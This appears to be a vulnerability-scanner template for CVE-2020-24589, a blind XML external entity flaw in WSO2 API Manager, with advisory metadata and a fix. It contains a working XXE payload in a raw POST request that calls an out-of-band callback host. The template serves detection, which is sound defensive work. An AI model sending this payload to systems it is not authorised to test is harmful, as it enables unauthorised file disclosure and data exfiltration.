49 lines
2.0 KiB
YAML
49 lines
2.0 KiB
YAML
id: CVE-2020-24589
|
|
|
|
info:
|
|
name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
|
|
author: lethargynavigator
|
|
severity: critical
|
|
description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery.
|
|
remediation: |
|
|
Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.
|
|
reference:
|
|
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24589
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
|
|
cvss-score: 9.1
|
|
cve-id: CVE-2020-24589
|
|
cwe-id: CWE-611
|
|
epss-score: 0.65025
|
|
epss-percentile: 0.97603
|
|
cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: wso2
|
|
product: api_manager
|
|
tags: cve,cve2020,wso2,xxe,oast,blind
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{{interactsh-url}}">%25xxe%3b]>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Failed to install the generic artifact type"
|
|
# digest: 4a0a004730450220552013b0e1dd487a3405f7894974c5c032a6bc53d7acb1cf95f28c5eb1e1100a022100aad266c122e2d50459986d82ad34ed28da741af159a61837612a55b5ddff60f1:922c64590222798bb761d5b6d8e72950 |